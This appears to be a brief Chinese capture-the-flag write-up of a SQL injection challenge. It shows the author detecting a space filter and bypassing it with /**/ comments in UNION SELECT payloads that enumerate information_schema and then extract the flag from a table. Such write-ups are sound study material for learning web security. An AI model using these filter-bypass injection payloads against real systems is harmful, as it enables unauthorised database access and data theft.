直接輸入11'報語法錯誤,然后輸入1' and '1'='1 報SQLi detected!,說明有防護,輸入1'and'1'='1回顯ID: 1'and'1'='1 name: baloteli 說明過濾了“空格”
照原有的思路,庫名,表名,字段名,flag進行嘗試
查看有哪些數據庫
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
查看有哪些表,1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
查看有哪些列:1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/'1'='1,可知有flag列,
查看flag數據:1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1,如下圖,flag為flag{Y0u_@r3_5O_dAmn_90Od}
